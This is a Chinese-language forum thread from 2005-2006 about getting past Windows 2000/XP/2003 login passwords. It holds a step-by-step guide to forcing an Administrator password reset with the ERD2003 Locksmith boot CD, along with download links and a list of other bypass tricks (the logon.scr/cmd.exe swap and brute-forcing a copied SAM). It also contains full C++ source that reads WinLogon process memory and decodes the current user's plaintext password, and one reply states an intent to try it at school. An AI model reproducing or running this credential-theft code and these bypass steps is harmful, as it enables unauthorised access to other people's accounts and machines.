教學 - 最強破解 XP，2000，2003 登入密碼的方法

mini · 2005-12-29, 04:02 PM

最強破解 XP，2000，2003 登入密碼的方法！（破解超級管理員密碼）

資料來源：
http://www.rus.net.tw/
http://hs.rus.net.tw/

經常見到有人遺忘了系統的管理員密碼來求助的，而網上針對此類的答案可謂五花八門，但經實踐發現其中絕大多數都是沒有用的，有些以訛傳訛的方法（例如在winxp系統下刪除sam檔等等）還會造成系統的徹底崩潰。

相比之下，利用 ERD2003 強行修改系統管理員密碼的方法簡單、易於操作，且對 2000/xp/2003 系統均有效。下面就具體介紹一下這個軟體的用法。

1. 當然是下載 ERD2003，解壓後，將其印象檔燒成光碟。
2. 光碟啟動，進入介面
3. 進入“系統”後，ERD2003會針對系統的網路等硬體設備進行一些設置，總之遇到要你選擇時一概選 yes 即可
4. 在網卡的配置時，系統提示說沒有經過 xp 的認證，不管它，一概選 yes
5. 接下來 ERD2003 會在你的硬碟媟j索所有已安裝的系統，再讓你選擇要修改的系統，這塈睊嚝 win2003 進行修改。按確定！
6. 正式進入 ERD2003 桌面了
7. 接下來是最關鍵的一步：按開始-修改密碼（或英文 start—administrative tools—locksmith），進入強行修改密碼的介面，隨後彈出的對話方塊會讓你選擇要修改密碼的用戶名（一般是選擇超級管理員 Administrator），選擇後即可強行修改密碼而不用輸入原始密碼，然後點擊 NEXT
8. 完成了，點擊 finish 之後就重啟吧，然後試試你修改的密碼，是不是進去了？原來 xp/2003 貌似嚴密的密碼保護也不過如此而已啊，一張小小的 erd2003 光碟就全破解了……

PS:網上其他一些傳說中破解 2000/xp/2003 密碼的方法如下：
1. 刪除 sam 檔——這種方法對 win2000 有效，對 xp 和 2003 不但無效，還會導致系統鎖死而徹底無法使用。
2. 用 winpe 啟動進控制臺，然後用 dos 命令手動增添用戶——除非原來管理員密碼就沒有設置，否則無效。
3. 將螢幕保護改名，將 cmd.exe 改名為 logon.scr （當然要掛在別的機器上改了），開機後等待 10 分鐘進入螢幕保護，實際上就進入了 dos 命令行介面，可以用 net 命令加用戶——已證明在 sp1、sp2、2003 中，這樣進入 dos 後的許可權根本不是管理員，因此也無法添加用戶。
4. 硬碟掛到別的機器上，copy 出 sam 文件，用 lc4 暴力解密——理論上是可以的，但如果密碼比較複雜的話，解密時間會 bt 的長。
5. 用 Windows Key 軟碟啟動系統，可直接修改管理員密碼——可是，我在網上根本找不到任何這個軟體的註冊碼或者註冊機，那樣是根本無法真正使用這個軟體的。
6. 2004年第14期的《大眾軟體》上介紹了一個新的螢幕保護程式破解法，但是根據我的試驗也是無法真正破解密碼的

「ERD2003」LiveCD下載點：(*2005/10/3 更新)
http://rapidshare.de/files/5812782/W...part1.rar.html
http://rapidshare.de/files/5813301/W...part2.rar.html
http://rapidshare.de/files/5813313/W...part3.rar.html
三個檔案都下載回來後放同一個資料夾，再用WinRAR解壓縮即可
(From 密技偷偷報 http://totalpost.pcuser.com.tw/2AT124.htm)

論壇相關帖:
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003

san · 2006-01-05, 06:53 PM

嗯　恩恩！　

　虎利害

crd1871 · 2006-01-06, 05:40 PM

蠻實用的,感謝分享~~

lupin1123 · 2006-01-07, 11:48 PM

有大大下載下來了嗎？
可以分享一下嗎？因為我要等1個小時才能繼續下載第2個檔案！
支援RS的小軟體都試過了！還是無法順利下載(2跟3)=.=

六翼黑帝斯 · 2006-01-15, 10:34 AM

超強~
這招先學著
以後在學校玩玩看!!@@...

180524 · 2006-01-15, 11:22 AM

引用:

作者: lupin1123

有大大下載下來了嗎？
可以分享一下嗎？因為我要等1個小時才能繼續下載第2個檔案！
支援RS的小軟體都試過了！還是無法順利下載(2跟3)=.=

我也是耶!
我用了RapidShare Ling Grab Helper
也是要等1小時才行
有哪位大大能解決嗎?

fang310 · 2006-04-28, 07:50 PM

引用:

作者: mini

最強破解 XP，2000，2003 登入密碼的方法！（破解超級管理員密碼）

資料來源：
http://www.rus.net.tw/
http://hs.rus.net.tw/

經常見到有人遺忘了系統的管理員密碼來求助的，而網上針對此類...

真是太感謝了....超好用的啦....

psac · 2006-09-23, 01:56 PM

教你如何獲取windows2000當前用戶的密碼

本文所用的代碼原創作者已不知.是ccrun的一個朋友磨刀老頭提供給的,在此對作者表示感謝.經ccrun(老妖)在Win2k下試驗成功.

// 獲取WinNT/Win2k當前用戶名和密碼，呼叫以下函數即可：
// bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
//---------------------------------------------------------------------------
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
}UNICODE_STRING, *PUNICODE_STRING;
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
}QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
}PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
}PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
}ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;

typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);

// Private Prototypes
BOOL IsWinNT(void);
BOOL IsWin2K(void);
BOOL AddDebugPrivilege(void);
DWORD FindWinLogon(void);
BOOL LocatePasswordPageWinNT(DWORD, PDWORD);
BOOL LocatePasswordPageWin2K(DWORD, PDWORD);
void ReturnWinNTPwd(String &, String &, String &);
void ReturnWin2kPwd(String &, String &, String &);
bool GetPassword(String &, String &, String &);

// Global Variables
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;

DWORD dwPwdLen = 0;
PVOID pvRealPwd = NULL;
PVOID pvPwd = NULL;
DWORD dwHashByte = 0;
wchar_t wszUserName[0x400];
wchar_t wszUserDomain[0x400];
//---------------------------------------------------------------------------
bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
if(!IsWinNT() && !IsWin2K())
{
// 只適合於2000或者xp
return false;
}
// Add debug privilege to PasswordReminder -
// this is needed for the search for Winlogon.
if(!AddDebugPrivilege())
{
// 不能夠新增debug特權
return false;
}
// debug特權已經成功加入到本程式
HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");
pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
GetProcAddress(hNtDll,"NtQuerySystemInformation");
pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");
pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)
GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");
pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER)
GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer");
pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING)
GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString");
// Locate WinLogon's PID - need debug privilege and admin rights.
DWORD dwWinLogonPID = FindWinLogon ();
if(!dwWinLogonPID)
{
// 找不到工作行程WinLogon 或者正在使用 NWGINA.DLL
// 導致不能在記憶體中找到密碼
FreeLibrary(hNtDll);
return false;
}
// Format("主工作行程WinLogon的id是 %d (0x%8.8x).\n",
// ARRAYOFCONST(((int)dwWinLogonPID, (int)dwWinLogonPID))));
// Set values to check memory block against.
memset(wszUserName, 0, sizeof (wszUserName));
memset(wszUserDomain, 0, sizeof (wszUserDomain));
GetEnvironmentVariableW(L"USERNAME",wszUserName,0x400);
GetEnvironmentVariableW(L"USERDOMAIN", wszUserDomain, 0x400);

// Locate the block of memory containing
// the password in WinLogon's memory space.
BOOL bFoundPasswordPage;
//bFoundPasswordPage = FALSE;
if(IsWin2K())
bFoundPasswordPage = LocatePasswordPageWin2K(dwWinLogonPID, &dwPwdLen);
else
bFoundPasswordPage = LocatePasswordPageWinNT(dwWinLogonPID, &dwPwdLen);
if(bFoundPasswordPage)
{
if(dwPwdLen == 0)
{
// Format("登入訊息為: 域名：%S/密碼：%S.\n",
// ARRAYOFCONST((wszUserDomain, wszUserName))));
// 密碼長度為空，系統沒有密碼
}
else
{
// Format("找到了密碼，長度為%d\n", ARRAYOFCONST(((int)dwPwdLen))));
// Decode the password string.
if(IsWin2K())
ReturnWin2kPwd(strCurrDomain, strCurrUser, strCurrPwd);
else
ReturnWinNTPwd(strCurrDomain, strCurrUser, strCurrPwd);
}
}
else
{
FreeLibrary(hNtDll);
return false;
}// 沒有在記憶體中間找到密碼
return true;
}
//---------------------------------------------------------------------------
BOOL IsWinNT(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if(GetVersionEx(&OSVersionInfo))
return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT);
else
return (FALSE);
}
//---------------------------------------------------------------------------
BOOL IsWin2K(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx(&OSVersionInfo))
return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
&& (OSVersionInfo.dwMajorVersion == 5));
else
return (FALSE);
}
//---------------------------------------------------------------------------
BOOL AddDebugPrivilege(void)
{
HANDLE Token;
TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
DWORD ReturnLength = 0;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token))
if(LookupPrivilegeValue(NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid))
{
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
return (AdjustTokenPrivileges(Token, FALSE, &TokenPrivileges,
sizeof (TOKEN_PRIVILEGES), &PreviousState, &ReturnLength));
}
return (FALSE);
}
//---------------------------------------------------------------------------
// 本文是ccrun(老妖)的一個朋友提供的代碼.有問題或建議請致信:info@ccrun.com
// 歡迎光臨C++ Builder 研究 http://www.ccrun.com
//---------------------------------------------------------------------------
// Note that the following code eliminates the need
// for PSAPI.DLL as part of the executable.
DWORD FindWinLogon(void)
{
#define INITIAL_ALLOCATION 0x100
DWORD dwRc = 0;
DWORD dwSizeNeeded = 0;
PVOID pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION);
// Find how much memory is required.
pfnNtQuerySystemInformation(0x10, pvInfo, INITIAL_ALLOCATION, &dwSizeNeeded);
HeapFree(GetProcessHeap(), 0, pvInfo);
// Now, allocate the proper amount of memory.
pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSizeNeeded);
DWORD dwSizeWritten = dwSizeNeeded;
if(pfnNtQuerySystemInformation(0x10, pvInfo, dwSizeNeeded, &dwSizeWritten))
{
HeapFree(GetProcessHeap(), 0, pvInfo);
return (0);
}
DWORD dwNumHandles = dwSizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
if(dwNumHandles == 0)
{
HeapFree(GetProcessHeap(), 0, pvInfo);
return (0);
}
PQUERY_SYSTEM_INFORMATION QuerySystemInformationP =
(PQUERY_SYSTEM_INFORMATION) pvInfo;
try
{
for(DWORD i=1; i<=dwNumHandles; i++)
{
// "5" is the value of a kernel object type process.
if (QuerySystemInformationP->HandleType == 5)
{
PVOID pvDebugBuffer = pfnRtlCreateQueryDebugBuffer(0, 0);
if(pfnRtlQueryProcessDebugInformation
(QuerySystemInformationP->PID, 1, pvDebugBuffer) == 0)
{
PPROCESS_INFO_HEADER pihProcessInfoHeader =
(PPROCESS_INFO_HEADER)((DWORD)pvDebugBuffer + 0x60);
DWORD dwCount = pihProcessInfoHeader->Count;
PPROCESS_INFO piProcessInfo = (PPROCESS_INFO)
((DWORD)pihProcessInfoHeader + sizeof (PROCESS_INFO_HEADER));
// Form1->Memo1->Lines->Add(piProcessInfo->Name);
AnsiString strName = piProcessInfo->Name;
// if(strstr((char *)UpCase(*piProcessInfo->Name), "WINLOGON") != 0)
if(strName.UpperCase().Pos("WINLOGON") != 0)
{
DWORD dwTemp = (DWORD)piProcessInfo;
for (DWORD j=0; j<dwCount; j++)
{
dwTemp += sizeof (PROCESS_INFO);
piProcessInfo = (PPROCESS_INFO)dwTemp;
strName = piProcessInfo->Name;
if(strName.UpperCase().Pos("NWGINA") !=0 )
return (0);
if(strName.UpperCase().Pos("MSGINA") !=0 )
dwRc =QuerySystemInformationP->PID;
}
if(pvDebugBuffer)
pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer);
HeapFree(GetProcessHeap(), 0, pvInfo);
return (dwRc);
}
}
if (pvDebugBuffer)
pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer);
}
DWORD dwTemp = (DWORD)QuerySystemInformationP;
dwTemp += sizeof(QUERY_SYSTEM_INFORMATION);
QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION)dwTemp;
}
}
catch(...)
{}
HeapFree(GetProcessHeap(), 0, pvInfo);
return (dwRc);
}
//---------------------------------------------------------------------------
BOOL LocatePasswordPageWinNT(DWORD dwWinLogonPID, PDWORD pdwPwdLen)
{
#define USER_DOMAIN_OFFSET_WINNT 0x200
#define USER_PASSWORD_OFFSET_WINNT 0x400
BOOL bRc = FALSE;
HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
FALSE, dwWinLogonPID);
if(!hWinLogonHandle)
return (bRc);
*pdwPwdLen = 0;
SYSTEM_INFO siSystemInfo;
GetSystemInfo(&siSystemInfo);
DWORD dwPEB = 0x7ffdf000;
DWORD dwBytesCopied = 0;
PVOID pvEBP = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, siSystemInfo.dwPageSize);
if(!ReadProcessMemory(hWinLogonHandle, (PVOID)dwPEB, pvEBP,
siSystemInfo.dwPageSize, &dwBytesCopied))
{
CloseHandle(hWinLogonHandle);
return (bRc);
}
// Grab the value of the 2nd DWORD in the TEB.
PDWORD pdwWinLogonHeap = (PDWORD)((DWORD)pvEBP + (6 * sizeof (DWORD)));
MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor;
if(VirtualQueryEx(hWinLogonHandle, (PVOID) *pdwWinLogonHeap,
&mbiMemoryBasicInfor, sizeof(MEMORY_BASIC_INFORMATION)))
if(((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) &&
((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0))
{
PVOID pvWinLogonMem = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
mbiMemoryBasicInfor.RegionSize);
if(ReadProcessMemory(hWinLogonHandle, (PVOID)*pdwWinLogonHeap,
pvWinLogonMem, mbiMemoryBasicInfor.RegionSize, &dwBytesCopied))
{
DWORD i = (DWORD)pvWinLogonMem;
DWORD dwUserNamePos = 0;
// The order in memory is wszUserName followed by the wszUserDomain.
do
{
if((wcscmp(wszUserName, (wchar_t *)i) == 0) &&
(wcscmp(wszUserDomain, (wchar_t *)
(i + USER_DOMAIN_OFFSET_WINNT)) == 0))
{
dwUserNamePos = i;
break;
}
i += 2;
}while(i < (DWORD)pvWinLogonMem + mbiMemoryBasicInfor.RegionSize);
if(dwUserNamePos)
{
PENCODED_PASSWORD_INFO pepiEncodedPwdInfo =
(PENCODED_PASSWORD_INFO)((DWORD)dwUserNamePos +
USER_PASSWORD_OFFSET_WINNT);
FILETIME ftLocalFileTime;
SYSTEMTIME stSystemTime;
if(FileTimeToLocalFileTime(&pepiEncodedPwdInfo->LoggedOn,
&ftLocalFileTime))
if(FileTimeToSystemTime(&ftLocalFileTime, &stSystemTime))
{}
// Format("你的登入時間為： %d/%d/%d %d:%d:%d\n",
// ARRAYOFCONST((stSystemTime.wMonth, stSystemTime.wDay,
// stSystemTime.wYear, stSystemTime.wHour,
// stSystemTime.wMinute, stSystemTime.wSecond))));
*pdwPwdLen = (pepiEncodedPwdInfo->EncodedPassword.Length
& 0x00ff) / sizeof (wchar_t);
dwHashByte = (pepiEncodedPwdInfo->EncodedPassword.Length
& 0xff00) >> 8;
pvRealPwd = (PVOID)(*pdwWinLogonHeap + (dwUserNamePos -
(DWORD)pvWinLogonMem) + USER_PASSWORD_OFFSET_WINNT + 0x34);
pvPwd = (PVOID)((PBYTE)(dwUserNamePos +
USER_PASSWORD_OFFSET_WINNT + 0x34));
bRc = TRUE;
}
}
}
HeapFree(GetProcessHeap(), 0, pvEBP);
CloseHandle(hWinLogonHandle);
return (bRc);
}
//---------------------------------------------------------------------------
BOOL LocatePasswordPageWin2K(DWORD dwWinLogonPID, PDWORD pdwPwdLen)
{
#define USER_DOMAIN_OFFSET_WIN2K 0x400
#define USER_PASSWORD_OFFSET_WIN2K 0x800
HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ, FALSE, dwWinLogonPID);
if(hWinLogonHandle == 0)
return (FALSE);
*pdwPwdLen = 0;
SYSTEM_INFO siSystemInfo;
GetSystemInfo(&siSystemInfo);
DWORD i = (DWORD)siSystemInfo.lpMinimumApplicationAddress;
DWORD dwMaxMemory = (DWORD) siSystemInfo.lpMaximumApplicationAddress;
DWORD dwIncrement = siSystemInfo.dwPageSize;
MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor;
while(i < dwMaxMemory)
{
if(VirtualQueryEx(hWinLogonHandle, (PVOID)i, &mbiMemoryBasicInfor,
sizeof (MEMORY_BASIC_INFORMATION)))
{
dwIncrement = mbiMemoryBasicInfor.RegionSize;
if (((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) &&
((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0))
{
PVOID pvRealStartingAddress = HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, mbiMemoryBasicInfor.RegionSize);
DWORD dwBytesCopied = 0;
if(ReadProcessMemory(hWinLogonHandle, (PVOID)i, pvRealStartingAddress,
mbiMemoryBasicInfor.RegionSize, &dwBytesCopied))
{
if((wcscmp((wchar_t *)pvRealStartingAddress, wszUserName) == 0)
&& (wcscmp((wchar_t *)((DWORD)pvRealStartingAddress +
USER_DOMAIN_OFFSET_WIN2K), wszUserDomain) == 0))
{
pvRealPwd = (PVOID)(i + USER_PASSWORD_OFFSET_WIN2K);
pvPwd = (PVOID)((DWORD)pvRealStartingAddress +
USER_PASSWORD_OFFSET_WIN2K);
// Calculate the length of encoded unicode string.
PBYTE pbTemp = (PBYTE)pvPwd;
DWORD dwLoc = (DWORD)pbTemp;
DWORD dwLen = 0;
if((*pbTemp == 0) && (*(PBYTE)((DWORD)pbTemp + 1) == 0))
{}
else
do
{
dwLen++;
dwLoc += 2;
pbTemp = (PBYTE) dwLoc;
}while(*pbTemp != 0);
*pdwPwdLen = dwLen;
CloseHandle(hWinLogonHandle);
return (TRUE);
}
}
HeapFree(GetProcessHeap(), 0, pvRealStartingAddress);
}
}
else
dwIncrement = siSystemInfo.dwPageSize;
// Move to next memory block.
i += dwIncrement;
}
CloseHandle(hWinLogonHandle);
return (FALSE);
}
//---------------------------------------------------------------------------
void ReturnWinNTPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
UNICODE_STRING usEncodedString;
usEncodedString.Length = (WORD)dwPwdLen * sizeof(wchar_t);
usEncodedString.MaximumLength =
((WORD)dwPwdLen * sizeof (wchar_t)) + sizeof(wchar_t);
usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, usEncodedString.MaximumLength);
CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof(wchar_t));
// Finally - decode the password.
// Note that only one call is required since the hash-byte
// was part of the orginally encoded string.
pfnRtlRunDecodeUnicodeString((BYTE)dwHashByte, &usEncodedString);
strCurrDomain = String(wszUserDomain);
strCurrUser = String(wszUserName);
strCurrPwd = AnsiString(usEncodedString.Buffer);
// Format("你的登入訊息是域名：%S 用戶名：%S 密碼：%S\n",
// ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer))));
// Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)dwHashByte))));
HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer);
}
//---------------------------------------------------------------------------
void ReturnWin2kPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
// DWORD dwHash = 0;
UNICODE_STRING usEncodedString;
usEncodedString.Length = (USHORT)dwPwdLen * sizeof(wchar_t);
usEncodedString.MaximumLength =
((USHORT)dwPwdLen * sizeof(wchar_t)) + sizeof(wchar_t);
usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, usEncodedString.MaximumLength);
// This is a brute force technique since the hash-byte
// is not stored as part of the encoded string - :>(.
for(DWORD i=0; i<=0xff; i++)
{
CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof (wchar_t));
// Finally - try to decode the password.
pfnRtlRunDecodeUnicodeString((BYTE)i, &usEncodedString);
// Check for a viewable password.
PBYTE pbTemp = (PBYTE)usEncodedString.Buffer;
BOOL bViewable = TRUE;
DWORD j, k;
for(j=0; (j<dwPwdLen) && bViewable; j++)
{
if((*pbTemp) && (*(PBYTE)(DWORD(pbTemp) + 1) == 0))
{
if(*pbTemp < 0x20)
bViewable = FALSE;
if(*pbTemp > 0x7e)
bViewable = FALSE;
}
else
bViewable = FALSE;
k = DWORD(pbTemp);
k += 2;
pbTemp = (PBYTE)k;
}
if(bViewable)
{
strCurrDomain = String(wszUserDomain);
strCurrUser = String(wszUserName);
strCurrPwd = String(usEncodedString.Buffer);
// Format("你的登入訊息為: 域名：%S 用戶名：%S 密碼：%S\n",
// ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer))));
// Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)i))));
}
}
HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer);
}
//---------------------------------------------------------------------------
// 呼叫舉例
void __fastcall TForm1::Button1Click(TObject *Sender)
{
String strCurrDomain, strCurrUser, strCurrPwd;
GetPassword(strCurrDomain, strCurrUser, strCurrPwd);
Memo1->Lines->Add(strCurrDomain);
Memo1->Lines->Add(strCurrUser);
Memo1->Lines->Add(strCurrPwd);

2006-10-07, 06:31 PM

謝謝分享支持一下

p933272349 · 2006-10-11, 05:42 PM

恩好厲害..非常感謝

lew · 2006-10-12, 04:57 PM

哇~~好厲害喔~!

乃乃 · 2006-10-23, 01:42 AM

沒想到還能DL，謝謝大大無私分享^^

Opisai · 2006-10-23, 10:11 AM

引用:

作者: mini

最強破解 XP，2000，2003 登入密碼的方法！（破解超級管理員密碼）

5. 用 Windows Key 軟碟啟動系統，可直接修改管理員密碼——可是，我在網上根本找不到任何這個軟體的註冊碼或者註冊機，那樣是根本無法真正使用這個軟體的。

我記得好像在史版下過 Windows Key ..是開機光碟，用它開機後就可以直接把密碼
改掉.. 很快。試過五..六次.. 都有用..

藍色協奏曲 · 2006-10-23, 06:21 PM

絕對有用,以win2000和winxp都是破解成功的!
在對win2x server中(大型serveru,也就是有raid,請先把raid卡驅動程式裝上)然後在用erd開機!

2006-10-24, 08:27 PM

刀射啦！！！！

2005-12-29, 04:02 PM	#1
mini 管理版主榮譽勳章勳章總數17 UID - 4144 在線等級: 註冊日期: 2002-12-07 文章: 13246 精華: 0 現金: 26235 金幣資產: 3024045 金幣	教學 - 最強破解 XP，2000，2003 登入密碼的方法最強破解 XP，2000，2003 登入密碼的方法！（破解超級管理員密碼）資料來源： http://www.rus.net.tw/ http://hs.rus.net.tw/ 經常見到有人遺忘了系統的管理員密碼來求助的，而網上針對此類的答案可謂五花八門，但經實踐發現其中絕大多數都是沒有用的，有些以訛傳訛的方法（例如在winxp系統下刪除sam檔等等）還會造成系統的徹底崩潰。相比之下，利用 ERD2003 強行修改系統管理員密碼的方法簡單、易於操作，且對 2000/xp/2003 系統均有效。下面就具體介紹一下這個軟體的用法。 1. 當然是下載 ERD2003，解壓後，將其印象檔燒成光碟。 2. 光碟啟動，進入介面 3. 進入“系統”後，ERD2003會針對系統的網路等硬體設備進行一些設置，總之遇到要你選擇時一概選 yes 即可 4. 在網卡的配置時，系統提示說沒有經過 xp 的認證，不管它，一概選 yes 5. 接下來 ERD2003 會在你的硬碟媟j索所有已安裝的系統，再讓你選擇要修改的系統，這塈睊嚝 win2003 進行修改。按確定！ 6. 正式進入 ERD2003 桌面了 7. 接下來是最關鍵的一步：按開始-修改密碼（或英文 start—administrative tools—locksmith），進入強行修改密碼的介面，隨後彈出的對話方塊會讓你選擇要修改密碼的用戶名（一般是選擇超級管理員 Administrator），選擇後即可強行修改密碼而不用輸入原始密碼，然後點擊 NEXT 8. 完成了，點擊 finish 之後就重啟吧，然後試試你修改的密碼，是不是進去了？原來 xp/2003 貌似嚴密的密碼保護也不過如此而已啊，一張小小的 erd2003 光碟就全破解了…… PS:網上其他一些傳說中破解 2000/xp/2003 密碼的方法如下： 1. 刪除 sam 檔——這種方法對 win2000 有效，對 xp 和 2003 不但無效，還會導致系統鎖死而徹底無法使用。 2. 用 winpe 啟動進控制臺，然後用 dos 命令手動增添用戶——除非原來管理員密碼就沒有設置，否則無效。 3. 將螢幕保護改名，將 cmd.exe 改名為 logon.scr （當然要掛在別的機器上改了），開機後等待 10 分鐘進入螢幕保護，實際上就進入了 dos 命令行介面，可以用 net 命令加用戶——已證明在 sp1、sp2、2003 中，這樣進入 dos 後的許可權根本不是管理員，因此也無法添加用戶。 4. 硬碟掛到別的機器上，copy 出 sam 文件，用 lc4 暴力解密——理論上是可以的，但如果密碼比較複雜的話，解密時間會 bt 的長。 5. 用 Windows Key 軟碟啟動系統，可直接修改管理員密碼——可是，我在網上根本找不到任何這個軟體的註冊碼或者註冊機，那樣是根本無法真正使用這個軟體的。 6. 2004年第14期的《大眾軟體》上介紹了一個新的螢幕保護程式破解法，但是根據我的試驗也是無法真正破解密碼的「ERD2003」LiveCD下載點：(*2005/10/3 更新) http://rapidshare.de/files/5812782/W...part1.rar.html http://rapidshare.de/files/5813301/W...part2.rar.html http://rapidshare.de/files/5813313/W...part3.rar.html 三個檔案都下載回來後放同一個資料夾，再用WinRAR解壓縮即可 (From 密技偷偷報 http://totalpost.pcuser.com.tw/2AT124.htm) 論壇相關帖: http://www.slime2.com.tw/forums/show...hlight=ERD2003 http://www.slime2.com.tw/forums/show...hlight=ERD2003 http://www.slime2.com.tw/forums/show...hlight=ERD2003 http://www.slime2.com.tw/forums/show...hlight=ERD2003 http://www.slime2.com.tw/forums/show...hlight=ERD2003

	送花文章: 1999, 收花文章: 7956 篇, 收花: 26748 次

2006-01-05, 06:53 PM	#2 (permalink)
san 註冊會員榮譽勳章勳章總數4 UID - 5994 在線等級: 註冊日期: 2002-12-08 文章: 147 精華: 0 現金: 5560 金幣資產: 6345935 金幣	嗯　恩恩！　　虎利害

	送花文章: 628, 收花文章: 21 篇, 收花: 122 次

2006-01-06, 05:40 PM	#3 (permalink)
crd1871 管理版主榮譽勳章勳章總數27 UID - 2270 在線等級: 註冊日期: 2002-12-06 住址: 星座命理討論區文章: 30462 精華: 1 現金: 3304 金幣資產: 910093304 金幣	蠻實用的,感謝分享~~

	送花文章: 1431, 收花文章: 15590 篇, 收花: 77858 次

2006-01-07, 11:48 PM	#4 (permalink)
lupin1123 註冊會員榮譽勳章勳章總數2 UID - 14335 在線等級: 註冊日期: 2002-12-19 VIP期限: 2011-05 住址: TAIWAN 文章: 266 精華: 0 現金: 5571 金幣資產: 77650 金幣	有大大下載下來了嗎？可以分享一下嗎？因為我要等1個小時才能繼續下載第2個檔案！支援RS的小軟體都試過了！還是無法順利下載(2跟3)=.=

	送花文章: 14, 收花文章: 14 篇, 收花: 21 次

2006-01-15, 10:34 AM	#5 (permalink)
